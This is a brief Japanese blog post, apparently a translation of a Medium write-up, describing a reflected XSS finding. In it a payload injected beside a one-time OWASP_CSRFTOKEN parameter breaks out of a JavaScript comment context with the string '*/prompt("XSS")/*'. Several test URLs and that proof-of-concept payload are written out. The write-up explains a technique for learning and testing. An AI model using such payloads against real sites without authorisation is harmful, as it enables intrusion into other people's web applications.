Desperate XSS から学ぶ

ソース:

medium.com

脆弱性XSS

 

訳:

このアプリケーションは非常に安全で、1 つのリクエストを 1 回だけ送信できるメカニズムがあり、この検証は URL クエリ パラメーター「OWASP_CSRFTOKEN」によって行われたと思います。
これは本質的に、リクエストをリピーターに受け取って操作することはできず、リクエストをリアルタイムでインターセプトし、[インターセプト] タブにペイロードを挿入する必要があることを意味します。 

 

 

 

.jsp?OWASP_CSRFTOKEN=2F8A-XXXX-XXXX-XXXX/*alert(1)*/

 

 

.jsp?OWASP_CSRFTOKEN=2F8A-XXXX-XXXX-XXXX&/*alert(1)*/

 

 

.jsp?xss=*/prompt("XSS")/*&OWASP_CSRFTOKEN=2F8A-XXXX-XXXX-XXXX

 

 

console.log(document.domain)

 

 

 

Payload: xss=*/prompt("XSS")/*&

 

 

3. コメントのコンテキストでペイロードが反映されました。
したがって、コメント終了記号 (*/) とコメント開始記号 (/*) を使用する必要がありました。
これにより、プロンプト (「XSS」) のコメントが解除され、実行できる状態になります。 

 

 

 

ほなほな。